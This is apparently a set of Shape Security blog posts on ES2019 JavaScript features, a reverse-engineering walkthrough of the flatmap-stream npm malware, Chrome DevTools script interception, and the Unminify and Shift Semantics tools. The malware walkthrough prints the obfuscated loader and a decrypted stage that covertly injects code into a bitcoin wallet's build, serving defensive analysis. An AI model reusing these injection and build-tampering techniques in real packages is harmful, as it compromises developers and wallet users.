ES2019 features coming to JavaScript (starring us!)

Shape Security has been contributing actively to TC39 and other standards bodies for the past 4 years, but this year is special for us. A significant portion of the features coming to JavaScript as part of the 2019 update are from Shape Security engineers! Shape contributes to standards bodies to ensure new features are added while taking into account evolving security implications. Anything Shape contributes outside of this broad goal is because we believe the web platform is the greatest platform ever made and we want to help it become even better.

Thanks to everyone who contributes to TC39 and thank you Michael Ficarra (@smooshMap), Tim Disney (@disnet), and Kevin Gibbons (@bakkoting) for representing Shape.

TL;DR

The 2019 update includes quality-of-life updates to JavaScript natives, and standardizes undefined or inconsistent behavior.

Buffed: String, Array, Object, Symbol, JSON

Nerfed: Try/Catch

Adjusted: Array.prototype.sort, Function.prototype.toString

Native API additions

Array.prototype.flat & .flatMap

> [ [1], [1, 2], [1, [2, [3] ] ] ].flat();
< [1, 1, 2, 1, [2, [3]]]

> [ [1], [1, 2], [1, [2, [3] ] ] ].flat(3);
< [1, 1, 2, 1, 2, 3]

The Array prototype methods flat and flatMap got unexpected attention this year, not because of their implementation, but because Shape Security engineer Michael Ficarra opened a gag pull request renaming the original method flatten to smoosh, thus starting SmooshGate. Michael opened the pull request as a joke after long TC39 meetings on the topic, and it ended up giving the average developer great insight into how TC39 works and how closely proposals are scrutinized. When considering new features to add to JavaScript, the TC39 committee has to take two decades of existing websites and applications into account to ensure no new feature unexpectedly breaks them.

After Firefox shipped flatten in its nightly releases, users found that websites using the MooTools framework were breaking. MooTools had added flatten to the Array prototype ten years earlier, and any site still using MooTools risks breaking if the method changes. Since MooTools usage has declined in favor of more modern frameworks, many sites using the library are no longer actively maintained and will not be updated even if MooTools releases a fixed version. SmooshGate ended up surfacing serious discussions as to what degree existing websites affect future and present innovation.

The committee concluded backwards compatibility was of higher importance and renamed the method flatten to flat. It’s a long, complicated story with an anticlimactic ending but that could be said of all specification work.

Drama aside, flat operates on an array and “flattens” nested arrays within to a configurable depth. flatMap operates similarly to the map method by applying a function to each element in the list and then calling flat() on the resulting list.
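
For example:

> [1, 2, 3].flatMap(x => [x, x * 2]);
< [1, 2, 2, 4, 3, 6]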

Object.fromEntries

let obj = { a: 1, b: 2 };
let entries = Object.entries(obj);
let newObj = Object.fromEntries(entries);

Object.fromEntries is a complement to the Object.entries method which allows a developer to more succinctly translate objects from one form to another. Object.entries takes a regular JavaScript object and returns a list of [key, value] pairs; Object.fromEntries enables the reverse.
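
This also makes it easy to transform an object by mapping over its entries and reassembling the result:

> Object.fromEntries(Object.entries({ a: 1, b: 2 }).map(([key, value]) => [key, value * 2]))
< { a: 2, b: 4 }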

String.prototype.trimStart & .trimEnd

> '   hello world   '.trimStart()
< "hello world   "

> '   hello world   '.trimEnd()
< "   hello world"

Major JavaScript engines had implementations of String.prototype.trimLeft() and String.prototype.trimRight(), but the methods lacked a true definition in the spec. This proposal standardizes the names as trimStart and trimEnd, aligning the terminology with padStart and padEnd, and keeps trimLeft and trimRight as aliases for the respective functions.

Symbol.prototype.description

> let mySymbol = Symbol('my description');
< undefined

> mySymbol.description
< 'my description'

Symbol.prototype.description is an accessor for the previously unexposed description property. Before this addition, the only way to access the description passed into the constructor was by converting the Symbol to a string via toString(), and there was no intuitive way to differentiate between Symbol() and Symbol('').
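
For example, toString() cannot distinguish an empty description from a missing one, but description can:

> Symbol().toString()
< "Symbol()"

> Symbol('').toString()
< "Symbol()"

> Symbol().description
< undefined

> Symbol('').description
< ""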

Spec & Language Cleanup

Try/Catch optional binding

try {
  throw new Error();
} catch {
  console.log('I have no error')
}

Until this proposal, omitting the binding on catch resulted in an error when parsing the JavaScript source text. This forced developers to declare a dummy binding that was both unnecessary and unused. This is another quality-of-life addition allowing developers to be more intentional when they ignore errors, improving the developer experience and reducing cognitive overhead for future maintainers.

Make ECMAScript a proper superset of JSON

The ECMAScript specification describes JSON as a subset of JavaScript in its definition of JSON.parse, yet valid JSON can contain the Unicode line separator (U+2028) and paragraph separator (U+2029) characters, which were not valid in JavaScript string literals. This proposal modifies the ECMAScript specification to allow those characters in string literals. The majority of developers will never encounter this usage, but it reduces edge-case handling for developers generating JavaScript from JSON and passing data between the two. Now you can insert any valid JSON into a JavaScript program without accounting for edge cases in a preprocessing stage.
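
A minimal illustration (note that the \u2028 escape in the outer string produces a raw line separator character in the source text handed to eval):

const source = '"\u2028"';  // a JSON document: a quoted U+2028 character
JSON.parse(source);         // always valid JSON
eval(source);               // a SyntaxError before ES2019, a valid string literal now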

Well-formed JSON.stringify

> JSON.stringify('\uD834\uDF06')
< "\"𝌆\""

> JSON.stringify('\uDF06\uD834')
< "\"\\udf06\\ud834\""

This proposal rectifies inconsistencies in the description and behavior of JSON.stringify. The ECMAScript spec describes JSON.stringify as returning a UTF-16 encoded JSON string, but it could return values that are invalid UTF-16 and unrepresentable in UTF-8 (specifically lone surrogates in the range U+D800 through U+DFFF). The accepted resolution is, when encoding lone surrogates, to return the code point as a Unicode escape sequence.

Stable Array.prototype.sort()

This is a change to the spec reflecting the behavior standardized by practice in major JavaScript engines. Array.prototype.sort is now required to be stable — values comparing as equal stay in their original order.
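
For example, elements that compare as equal now reliably keep their original relative order:

> [{ name: 'a', rank: 1 }, { name: 'b', rank: 1 }, { name: 'c', rank: 0 }].sort((x, y) => x.rank - y.rank).map(x => x.name)
< ["c", "a", "b"]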

Revised Function.prototype.toString()

The proposal to revise Function.prototype.toString has been a work in progress for over 3 years and was another championed by Michael Ficarra due to problems and inconsistencies in the existing spec. This revision clarifies and standardizes what source text toString() should return for functions defined in all their different forms. For functions created from parsed ECMAScript source, toString() will preserve the whole source text, including whitespace and comments.
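
For example:

> function add(a, b) { /* sum */ return a + b; }

> add.toString()
< "function add(a, b) { /* sum */ return a + b; }"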

Onward and upward

ES2015 was a big step for JavaScript with massive new changes and, because of the problems associated with a large change set, the TC39 members agreed it is more sustainable to produce smaller, yearly updates. Most of the features above are already implemented in major JavaScript engines and can be used today.

If you are interested in reading more TC39 proposals, including dozens which are in early stages, the committee makes its work available publicly on GitHub. Take a look at some of the more interesting proposals like the pipeline operator and optional chaining.

Reverse Engineering JS by example

flatmap-stream payload A

In November, the npm package event-stream was exploited via a malicious dependency, flatmap-stream. The whole ordeal was written up here and the focus of this post is to use it as a case study for reverse engineering JavaScript. The 3 payloads associated with flatmap-stream are simple enough to be easy to write about and complex enough to be interesting. While it is not critical to understand the backstory of this incident in order to understand this post, I will be making assumptions that might not be obvious if you aren’t somewhat familiar with the details.

Reverse engineering most JavaScript is more straightforward than reversing the binary executables you may run on your desktop OS (after all, the source is right in front of you), but JavaScript that is designed to be difficult to understand often goes through a few passes of obfuscation to obscure its intent. Some of this obfuscation comes from "minification", the process of reducing the overall byte count of the source as much as possible to save space. Minification shortens variable names to single-character identifiers and translates expressions like true into shorter but equivalent forms like !0. It is mostly unique to JavaScript's ecosystem because of its web browser origins, shows up in node packages mainly through reuse of the same tooling, and is not intended as a security measure. For basic reversal of common minification and obfuscation techniques, check out Shape's unminify tool. Dedicated obfuscation passes may come from tools designed to obfuscate or may be performed manually by the developer.
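
As a small illustration of what minification alone does to readability (the code here is invented for the example), a minifier might turn this:

// Before minification
function isEnabled(feature) {
  return feature.enabled === true;
}

// After minification: identifiers shortened, `true` rewritten as the equivalent !0
function i(f){return f.enabled===!0}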

The first step is to get your hands on the isolated source for analysis. The flatmap-stream package was crafted specifically to look innocent except for a malicious payload included in only one version of the package, version 0.1.1. You can quickly see the changes to the source by diffing version 0.1.2 and version 0.1.1, or even just alternating between the URLs in two tabs. For the rest of the post we’ll be referring to the appended source as payload A. Below is the formatted source of payload A.

! function() {
    try {
        var r = require,
            t = process;

        function e(r) {
            return Buffer.from(r, "hex").toString()
        }
        var n = r(e("2e2f746573742f64617461")),
            o = t[e(n[3])][e(n[4])];
        if (!o) return;
        var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
            a = u.update(n[0], e(n[8]), e(n[9]));
        a += u.final(e(n[9]));
        var f = new module.constructor;
        f.paths = module.paths, f[e(n[7])](a, ""), f.exports(n[1])
    } catch (r) {}
}();

First things first: NEVER RUN MALICIOUS CODE (except in isolated environments). I’ve written my own tools to help me refactor code dynamically using the Shift suite of parsers and JavaScript transformers, but you can use an IDE like Visual Studio Code for the purposes of following along with this post.

When reverse engineering JavaScript it is valuable to keep the mental juggling to a minimum. This means getting rid of any expressions or statements that don’t add immediate value and also reversing the DRYness of any code that has been optimized automatically or manually. Since we’re statically analyzing the JavaScript and tracking execution in our heads, the deeper your mental stack grows the more likely it is you’ll get lost.

One of the simplest things you can do is unminify variables that are being assigned global properties like require and process, like on lines 3 and 4.

var r = require,
    t = process;

You can do this with any IDE that offers refactoring capabilities (usually by pressing “F2” over an identifier you want to rename). After that, we see a function definition, e, which appears to simply decode a hex string.

function e(r) {
    return Buffer.from(r, "hex").toString()
}

The first interesting line of code appears to import a file which comes from the result of the function e decoding the string "2e2f746573742f64617461".

var n = require(e("2e2f746573742f64617461")),

It is extremely common for deliberately obfuscated JavaScript to obscure literal string values so that anyone who takes a passing glance won’t be alerted by particularly ominous strings or properties in clear view. Most developers recognize this is a very low hurdle, so you’ll often find trivially reversible encoding in place, and that’s no different here. The e function simply decodes hex-encoded strings, and you can do that manually via an online tool or with your own convenience function. Even if you’re confident that you understand what the e function is doing, it’s still a good idea not to run it (even if you extract it) with input found in a malicious file, because you have no guarantees that the attacker hasn’t found a security vulnerability which is triggered by the data.
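
If you want a convenience function of your own, a minimal dependency-free sketch (decodeHex is an invented name) that you can run against the extracted strings in a scratch file looks like this:

function decodeHex(hex) {
  // Translate each pair of hex digits into the character it encodes.
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

decodeHex('2e2f746573742f64617461'); // './test/data'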

After reversing that string we see that the script is including a data file, './test/data' which is located in the distributed npm package.

module.exports = [
  "75d4c87f3[...large entry cut...]68ecaa6629",
  "db67fdbfc[...large entry cut...]349b18bc6e1",
  "63727970746f",
  "656e76",
  "6e706d5f7061636b6167655f6465736372697074696f6e",
  "616573323536",
  "6372656174654465636970686572",
  "5f636f6d70696c65",
  "686578",
  "75746638"
];

After renaming n to data and deobfuscating the calls from e(n[2]) through e(n[9]) we start to see a better picture of what we’re dealing with here.

(function () {
  try {
    var data = require("./test/data");
    var o = process["env"]["npm_package_description"];
    var u = require("crypto")["createDecipher"]("aes256", o);
    var a = u.update(data[0], "hex", "utf8");
    a += u.final("utf8");
    var f = new module.constructor;
    f.paths = module.paths;
    f["_compile"](a, "");
    f.exports(data[1]);
  } catch (r) {}
}());

It’s also easy to see why these strings were hidden: finding any references to decryption in a simple flatmap library would be a dead giveaway that something is very wrong.

From here we see the script is importing node.js’s “crypto” library and, after looking up the APIs, we find that the second argument to createDecipher, o here, is the password used to decrypt. Now we can rename that argument and the following return values to sensible names based on the API. Every time we find a new piece of the puzzle it’s important to immortalize it via a refactor or a comment, even if it’s a renamed variable that seems trivial. It’s very common when diving through foreign code for hours to lose your place, get distracted, or need to backtrack because of some erroneous refactor. Using git to save checkpoints during a refactor is valuable as well, but I’ll leave that decision to you. The code now looks as follows, with the e function deleted because it is no longer used, along with the statement if (!o) return; because it doesn’t add value to the analysis.

(function () {
  try {
    var data = require("./test/data");
    var password = process["env"]["npm_package_description"];
    var decipher = require("crypto")["createDecipher"]("aes256", password);
    var decrypted = decipher.update(data[0], "hex", "utf8");
    decrypted += decipher.final("utf8");
    var newModuleInstance = new module.constructor;
    newModuleInstance.paths = module.paths;
    newModuleInstance["_compile"](decrypted, "");
    newModuleInstance.exports(data[1]);
  } catch (r) {}
}());

You’ll also notice I’ve renamed f to newModuleInstance. With code this short it’s not critical but with code that might be hundreds of lines long it’s important for everything to be as clear as possible.

Now payload A is largely deobfuscated and we can walk through it to understand what it does.

Line 3 imports our external data.

var data = require("./test/data");

Line 4 grabs a password out of the environment. process.env allows you to access environment variables from within a node script, and npm_package_description is a variable that npm, node’s package manager, sets when you run scripts defined in a package.json file.

var password = process["env"]["npm_package_description"];
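
As a sketch of where that value comes from (the package contents below are invented for illustration), npm exposes package.json fields as npm_package_* environment variables whenever it runs a script:

// Hypothetical package.json:
// {
//   "name": "victim-app",
//   "description": "An example project description",
//   "scripts": { "build": "node build.js" }
// }
// While `npm run build` executes build.js, npm sets:
console.log(process.env.npm_package_description); // "An example project description"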

Line 5 creates a decipher instance with the value from npm_package_description as the password. This means that the encrypted payload can only be decrypted when this script is executed via npm and is being executed for a particular project that has, in its package.json, a specific description field. That’s going to be tough.

var decipher = require("crypto")["createDecipher"]("aes256", password);

Lines 6 and 7 decrypt the first element in our external file and store it in the variable "decrypted".

var decrypted = decipher.update(data[0], "hex", "utf8");
decrypted += decipher.final("utf8");

Lines 8-11 create a new module and then feed the decrypted data into the undocumented method _compile. This module then exports the second element of our external data file. module.exports is node’s mechanism for exposing data from one module to another, so newModuleInstance.exports(data[1]) is exposing a second encrypted payload found in our external data file.

var newModuleInstance = new module.constructor;
newModuleInstance.paths = module.paths;
newModuleInstance["_compile"](decrypted, "");
newModuleInstance.exports(data[1]);

At this point we have encrypted data that is only decryptable with a password found in a package.json somewhere and whose decrypted result gets fed into the _compile method. Now we are left with a problem: how do you decrypt data when the password is unknown? This is a non-trivial question: if it were easy to brute force aes256 encryption, we’d have bigger problems than an npm package being taken over. Luckily we’re not dealing with a completely unknown set of possible passwords, just any string that happened to be entered into a package.json somewhere. package.json files originated as the file format for npm package metadata, so we may as well start at the official npm registry. Luckily there’s an npm package that gives us a stream of all package metadata.

There’s no guarantee our target file is located in an npm package (many non-npm projects use package.json to store configuration for node-based tools, and package.json descriptions can change from version to version), but it’s a good place to start. It is also possible for decryption with a wrong key to succeed and produce garbled gibberish, so we need some way of validating our decrypted payload during this brute forcing process. Since we’re dealing with something that is fed to Module.prototype._compile, which feeds vm.runInThisContext, we can reasonably assume that the output is JavaScript, and we can use any number of JavaScript parsers to validate the data. If our password fails, or if it succeeds but our parser throws an error, then we move on to the next package.json. Conveniently, Shape Security has built its own set of JavaScript parsers for use in JavaScript and Java environments. The brute force script used is here:

const crypto = require('crypto');
const registry = require('all-the-packages')
const data = require('./test-data');
const { parseScript } = require('shift-parser');

let num = 0;
const start = Date.now();
registry
  .on('package', function (pkg) {
    num++;
    const password = pkg.description;
    const decrypted = decrypt(data[0], password);
    if (decrypted && parse(decrypted)) {
      console.log(`Password is '${password}' from ${pkg.name}@${pkg.version}`);
    }
  })
  .on('end', function () {
    const end = Date.now();
    console.log(`Done. Processed ${num} package's metadata in ${(end - start) / 1000} seconds.`);
  })

function decrypt(data, password) {
  try {
    const decipher = crypto.createDecipher("aes256", password);
    let decrypted = decipher.update(data, "hex", "utf8");
    decrypted += decipher.final("utf8");
    return decrypted;
  } catch (e) {
    return false;
  }
}

function parse(input) {
  try { 
    parseScript(input);
    return true;
  } catch(e) {
    return false;
  }
}

After running this for 92.1 seconds and processing 740,543 packages we come up with our password, "A Secure Bitcoin Wallet", which successfully decodes the payload included below:

/*@@*/
module.exports = function(e) {
    try {
        if (!/build\:.*\-release/.test(process.argv[2])) return;
        var t = process.env.npm_package_description,
            r = require("fs"),
            i = "./node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js",
            n = r.statSync(i),
            c = r.readFileSync(i, "utf8"),
            o = require("crypto").createDecipher("aes256", t),
            s = o.update(e, "hex", "utf8");
        s = "\n" + (s += o.final("utf8"));
        var a = c.indexOf("\n/*@@*/");
        0 <= a && (c = c.substr(0, a)), r.writeFileSync(i, c + s, "utf8"), r.utimesSync(i, n.atime, n.mtime), process.on("exit", function() {
            try {
                r.writeFileSync(i, c, "utf8"), r.utimesSync(i, n.atime, n.mtime)
            } catch (e) {}
        })
    } catch (e) {}
};

This was lucky. What could have been a monstrous brute forcing problem ended up needing less than a million iterations. The affected package with the key in question ended up being the bitcoin wallet Copay’s client application. The next two payloads dive deeper into the application itself and, given the target application is centered around storing bitcoins, you can probably guess where this might be going.

If you find topics like this interesting and want to read an analysis for the other two payloads or future attacks, then be sure to “like” this post or let me know on twitter at @jsoverson.

Intercepting and Modifying responses with Chrome via the Devtools Protocol

At Shape we come across many sketchy pieces of JavaScript. Scripts might be maliciously injected into pages, sent to us by a customer for advice, or found by our security teams as resources on the web that seem to specifically reference some aspects of our service. As part of our everyday routine, we dive into these scripts head first to understand what they’re doing and how they work. They are usually minified, often obfuscated, and always require multiple levels of modification before they are really ready for deep analysis.

Until recently, the easiest way to do this analysis was either with locally cached setups that enable manual editing or by using proxies to rewrite content on the fly. The local solution is the most convenient, but websites do not always translate perfectly to other environments, and it often leads people down a rabbit hole of troubleshooting just to get productive. Proxies are extremely flexible but usually cumbersome and not very portable: everyone has their own custom setup for their environment, and some people are more familiar with one proxy than another. I’ve started to use Chrome and its devtools protocol to hook into requests and responses as they happen and modify them on the fly. This is portable to any platform that has Chrome, bypasses a whole slew of issues, and integrates well with common JavaScript tooling. In this post, I’ll go over how to intercept and modify JavaScript on the fly using Chrome’s devtools protocol.

We’ll use node but a lot of the content is portable to your language of choice provided you have the devtools hooks easily accessible.

First off, if you’ve never explored scripting Chrome, Eric Bidelman wrote up an excellent Getting Started Guide for Headless Chrome. The tips there apply to both Headless and GUI Chrome (with one quirk I’ll address in the next section).

Launching Chrome

We’ll use the chrome-launcher library from npm to make this easy.


npm install chrome-launcher

chrome-launcher does precisely what you think it would do and you can pass the same command line switches you’re used to from the terminal unchanged (a great list is maintained here). We’ll pass the following options:

  • --window-size=1200,800
    • Automatically set the window size to something reasonable.
  • --auto-open-devtools-for-tabs
    • Automatically open up the devtools because we use them frequently.
  • --user-data-dir=/tmp/chrome-testing
    • Set a constant user data directory. (Ideally we wouldn’t need this but non-headless mode on macOS doesn’t seem to allow you to intercept requests without this flag. If you know of a better way, please let me know via Twitter!)

const chromeLauncher = require('chrome-launcher');

async function main() {
  const chrome = await chromeLauncher.launch({
    chromeFlags: [
      '--window-size=1200,800',
      '--user-data-dir=/tmp/chrome-testing',
      '--auto-open-devtools-for-tabs'
    ]
  });
}

main();

Try running your script to make sure you’re able to open Chrome. You should see something like this:

[Screenshot: Chrome window launched by the script with the devtools automatically opened]

Using the Chrome Devtools Protocol

This is also referred to as the “Chrome debugger protocol,” and both terms seem to be used interchangeably in Google’s docs 🤷‍♂️. First, install the package chrome-remote-interface via npm which gives us convenient methods to interact with the devtools protocol. Make sure to have the protocol docs handy if you want to dive in more deeply.


npm install chrome-remote-interface

To use the CDP, you need to connect to the debugger port and, because we’re using the chrome-launcher library, this is conveniently accessible via chrome.port.


const protocol = await CDP({ port: chrome.port });

Many of the domains in the protocol need to be enabled first, and we’re going to start with the Runtime domain so that we can hook into the console API and deliver any console calls in the browser to the command line.


const { Runtime } = protocol;

await Promise.all([Runtime.enable()]);

Runtime.consoleAPICalled(({ args, type }) =>
  console[type].apply(console, args.map(a => a.value))
);

Now when you run your script, you get a fully functional Chrome window that also outputs all of its console messages to your terminal. That’s awesome on its own, especially for testing purposes!

Intercepting requests

First, we’ll need to register what we want to intercept by submitting a list of RequestPatterns to setRequestInterception. You can intercept at either the “Request” stage or the “HeadersReceived” stage and, to actually modify a response, we’ll need to wait for “HeadersReceived”. The resource type maps to the types that you’d commonly see on the network pane of the devtools.

Don’t forget to enable the Network domain as you did with Runtime, above, by adding Network.enable() to the same array.
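
With the Network domain added, the enabling code from earlier becomes:

const { Runtime, Network } = protocol;

await Promise.all([Runtime.enable(), Network.enable()]);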


await Network.setRequestInterception({
  patterns: [
    {
      urlPattern: '*.js*',
      resourceType: 'Script',
      interceptionStage: 'HeadersReceived'
    }
  ]
});

Registering the event handler is relatively straightforward, and each intercepted request comes with an interceptionId that can be used to query information about the request or eventually issue a continuation. Here we’re just stepping in and logging every request we intercept to the terminal.


Network.requestIntercepted(async ({ interceptionId, request }) => {
  console.log(`Intercepted ${request.url} {interception id: ${interceptionId}}`);

  Network.continueInterceptedRequest({
    interceptionId,
  });
});

Modifying requests

To modify requests we’ll need to install some helper libraries that will encode and decode base64 strings. There are loads of libraries available; feel free to pick your own. We’ll use atob and btoa.


npm install btoa atob

The API to deal with responses is a little awkward. To handle responses, you need to include all your response logic on the request interception (as opposed to simply intercepting a response, for example) and then you have to query for the body by the interception ID. This is because the body might not be available at the time your handler is called and this allows you to explicitly wait for just what you’re looking for. The body can also come base64 encoded so you’ll want to check and decode it before blindly passing it along.


const response = await Network.getResponseBodyForInterception({ interceptionId });
const bodyData = response.base64Encoded ? atob(response.body) : response.body;

At this point you’re free to go wild on the JavaScript. Your code puts you in the middle of a response allowing you to both access the complete JavaScript that was requested and send back your modified response. Awesome! We’ll just tweak the JS by appending a console.log at the end of it so that our terminal will get a message when our modified code is executed in the browser.


const newBody = bodyData + `\nconsole.log('Executed modified resource for ${request.url}');`;

We can’t simply pass along a modified body alone because the content might conflict with the headers that were sent with the original resource. Since you’re actively testing and tweaking, you’ll probably want to start with the basics before worrying too much about any other header information you need to convey. You can access the response headers via responseHeaders passed to the event handler if necessary, but for now we’ll just craft our own minimal set in an array for easy manipulation and editing later.


const newHeaders = [
  'Date: ' + (new Date()).toUTCString(),
  'Connection: closed',
  'Content-Length: ' + newBody.length,
  'Content-Type: text/javascript'
];

Sending the new response down requires crafting a full, base64 encoded HTTP response (including the HTTP status line) and sending it through a rawResponse property in the object passed to continueInterceptedRequest.


Network.continueInterceptedRequest({
  interceptionId,
  rawResponse: btoa(
    'HTTP/1.1 200 OK\r\n' +
    newHeaders.join('\r\n') +
    '\r\n\r\n' +
    newBody
  )
});

Now, when you execute your script and navigate around the internet, you’ll see something like the following in your terminal as your script intercepts JavaScript, your modified JavaScript executes in the browser, and the console.log()s bubble up through the hook we made at the start of the tutorial.

[Screenshot: terminal output showing intercepted script URLs and the console messages from the modified JavaScript]

The complete working code for the basic example is here:


const chromeLauncher = require('chrome-launcher');
const CDP = require('chrome-remote-interface');
const atob = require('atob');
const btoa = require('btoa');

async function main() {
  const chrome = await chromeLauncher.launch({
    chromeFlags: [
      '--window-size=1200,800',
      '--user-data-dir=/tmp/chrome-testing',
      '--auto-open-devtools-for-tabs'
    ]
  });

  const protocol = await CDP({ port: chrome.port });

  const { Runtime, Network } = protocol;

  await Promise.all([Runtime.enable(), Network.enable()]);

  Runtime.consoleAPICalled(({ args, type }) => console[type].apply(console, args.map(a => a.value)));

  await Network.setRequestInterception({ patterns: [{ urlPattern: '*.js*', resourceType: 'Script', interceptionStage: 'HeadersReceived' }] });

  Network.requestIntercepted(async ({ interceptionId, request }) => {
    console.log(`Intercepted ${request.url} {interception id: ${interceptionId}}`);

    const response = await Network.getResponseBodyForInterception({ interceptionId });
    const bodyData = response.base64Encoded ? atob(response.body) : response.body;

    const newBody = bodyData + `\nconsole.log('Executed modified resource for ${request.url}');`;

    const newHeaders = [
      'Date: ' + (new Date()).toUTCString(),
      'Connection: closed',
      'Content-Length: ' + newBody.length,
      'Content-Type: text/javascript'
    ];

    Network.continueInterceptedRequest({
      interceptionId,
      rawResponse: btoa('HTTP/1.1 200 OK' + '\r\n' + newHeaders.join('\r\n') + '\r\n\r\n' + newBody)
    });
  });
}

main();

Where to go from here

You can start by pretty printing the source code, which is always a useful way to start reverse engineering something. Yes, of course, you can do this in most modern browsers, but you’ll want to control each step of modification yourself in order to keep things consistent across browsers and browser versions and to be able to connect the dots as you analyze the source. When I’m digging into foreign, obfuscated code I like to rename variables and functions as I start to understand their purpose. Modifying JavaScript safely is no trivial exercise and that’s a blog post on its own, but for now you could use something like unminify to undo common minification and obfuscation techniques.

You can install unminify via npm and wrap your new JavaScript body with a call to unminify in order to see it in action:


const unminify = require('unminify');

[...]

const newBody = unminify(bodyData + `\nconsole.log('Intercepted and modified ${request.url}');`);

We’ll dive more into the transformations in the next post. If you have any questions, comments, or other neat tricks, please reach out to me via Twitter!

Introducing Unminify

Shape Security is proud to announce the release of Unminify, our new open source tool for the automatic cleanup and deobfuscation of JavaScript.

Example

Given


function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

Unminify produces


function validate(i) {
  log(i);
  if (isValid(i)) {
    return 'ok';
  } else {
    return 'no';
  }
}

Installation and usage

Unminify is a node.js module and is available on npm. It can be installed globally with npm install -g unminify and then executed as unminify file.js, or executed without installation as npx unminify file.js. It is also suitable for use as a library. For more, see the readme.

Unminify supports several levels of transformation, depending on how carefully the original semantics of the program need to be tracked. Some transformations can alter some or all behavior of the program under some circumstances; these are disabled by default.

Background

JavaScript differs from most programming languages in that it has no portable compiled form: the language which humans write is the same as the language which browsers download and execute.

In modern JavaScript development, however, there is still usually at least one compilation step. Experienced JavaScript developers are probably familiar with tools like UglifyJS, which are designed to transform JavaScript source files to minimize the amount of space they take while retaining their functionality, allowing humans to write code they can read without sending extraneous information like comments and whitespace to browsers. In addition, UglifyJS transforms the underlying structure (the abstract syntax tree, or AST) of the source code: for example, it rewrites if (a) { b(); c(); } to the equivalent a&&(b(),c()) anywhere such a construct occurs in the source. Code which has been processed by such tools is generally significantly less readable; however, this is not necessarily a goal of UglifyJS and similar minifiers.

In other cases, the explicit goal is to obfuscate code (i.e., to render it difficult for humans and/or machines to analyze). In practice, most tools for this are not significantly more advanced than UglifyJS. Such tools generally operate by transforming the source code in one or more passes, each time applying a specific technique intended to obscure the program’s behavior. A careful human can effectively undo these by hand, given time proportional to the size of the program.

Simple examples

Suppose our original program is as follows:


function validate(input) {
  log(input);
  if (isValid(input)) {
    return 'ok';
  } else {
    return 'no';
  }
}

UglifyJS will turn this into


function validate(i){return log(i),isValid(i)?"ok":"no"}

and an obfuscation tool might further rewrite this to


function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

State of the art

There are well-established tools like Prettier for formatting JavaScript source by the addition of whitespace and other non-semantic syntax which improves readability. These undo half of what a tool like UglifyJS does, but because they are intended for use by developers on their own code rather than for analysis of code produced elsewhere, they do not transform the underlying structure. Running Prettier on the above example gives


function validate(i) {
  var _ = ["no", "ok"];
  return log(i), isValid(i) ? _[1] : _[0];
}

Other tools like JSTillery and JSNice do offer some amount of transformation of the structure of the code. However, in practice they tend to be quite limited. In our example above, JSTillery produces


function validate(i)
    /*Scope Closed:false | writes:false*/
    {
        return log(i), isValid(i) ? 'ok' : 'no';
    }

and JSNice produces


function validate(i) {
  var _ = ["no", "ok"];
  return log(i), isValid(i) ? _[1] : _[0];
}

Unminify

Unminify is our contribution to this space. It can undo most of the transformations applied by UglifyJS and by simple obfuscation tools. On our example above, given the right options it will fully restore the original program except for the name of the local variable input, which is not recoverable:


function validate(i) {
  log(i);
  if (isValid(i)) {
    return 'ok';
  } else {
    return 'no';
  }
}

Unminify is built on top of our open source Shift family of tools for the analysis and transformation of JavaScript.

Operation

The basic operation of Unminify consists of parsing the code to an AST, applying a series of transformations to that AST iteratively until no further changes are possible, and then generating JavaScript source from the final AST. These transformations are merely functions which consume a Shift AST and produce a Shift AST.

This process is handled well by the Shift family, which makes it simple to write and, crucially, reason about analysis and transformation passes on JavaScript source. There is very little magic under the hood.

Unminify has support for adding additional transformation passes to its pipeline. These can be passed with the --additional-transform transform.js flag, where transform.js is a file exporting a transformation function. If you develop a transformation which is generally useful, we encourage you to contribute it!
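
As a sketch of what such a pass might look like (the file name transform.js and the module.exports shape are assumptions based on the description above, not Unminify's documented API), here is a pass that rewrites the common minifier idioms !0 and !1 back into boolean literals by walking the plain-object Shift AST:

// transform.js: a function from a Shift AST to a Shift AST.
// Rewrites !0 to true and !1 to false by generically walking the tree.
module.exports = function booleanLiterals(ast) {
  function walk(node) {
    if (node == null || typeof node !== 'object') return node;
    if (Array.isArray(node)) return node.map(walk);
    if (
      node.type === 'UnaryExpression' &&
      node.operator === '!' &&
      node.operand.type === 'LiteralNumericExpression' &&
      (node.operand.value === 0 || node.operand.value === 1)
    ) {
      // !0 becomes true, !1 becomes false
      return { type: 'LiteralBooleanExpression', value: node.operand.value === 0 };
    }
    const copy = {};
    for (const key of Object.keys(node)) copy[key] = walk(node[key]);
    return copy;
  }
  return walk(ast);
};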

Shift Semantics

A few months ago, Shape released Shift Semantics, the newest tool in the Shift family of ECMAScript tooling.

The Shift Semantics library defines a structure for representing the behaviour of an ECMAScript program as well as a function for deriving one of these structures from a Shift AST.

Background

While ECMAScript has many syntactic features, not every one of them maps to a unique behaviour. For instance, all static member accesses (a.b) can be represented in terms of computed member accesses on strings (a['b']), and all for loops can be written in terms of while loops. Shift Semantics defines a data structure called an abstract semantic graph (ASG) which has a node for each individual operation that an ECMAScript interpreter would need to be able to interpret all ECMAScript programs. When an ASG is created, information about the original syntactic representation is lost. Only the important bit about what that program is supposed to do remains.

Why is this useful?

Many use cases for ECMAScript tooling do not involve knowledge of the original representation of the program. For instance, if one is compiling an ECMAScript program to another lower-level language, it is convenient to define a compilation once for all loops instead of repeating much of the same code for each looping construct in the language. This greatly reduces the number of structures you have to consider for your transformation/analysis and eliminates any need for code duplication.

What does it look like?

There are 52 ASG nodes. Many of them have an obvious meaning: Loop, MemberAccess, GlobalReference, LiteralNumber, etc. Others are not as obvious. Keys is an Object.keys analogue, used to represent the for-in behaviour of retrieving the enumerable keys of an object before looping over them. RequireObjectCoercible represents the internal spec operation of the same name. Halt explicitly indicates that the program has run to completion, though it’s also allowed to be used in other places within the graph if one desires.

Update: If you’d like to see GraphViz visualisations, see the examples in Pull Request #8 or run the visualiser yourself on a program of your choosing.

How do I use it?

If you don’t already have a Shift AST for your program, you will need to use the parser to create one:

import com.shapesecurity.shift.parser.Parser;

String js = "f(0);";

// if you have a script
Script script = Parser.parseScript(js);
// if you have a module
Module module = Parser.parseModule(js);

Once you have your Shift AST, pass it to the Explicator:

import com.shapesecurity.shift.semantics.Explicator;

Semantics semantics = Explicator.deriveSemantics(program);

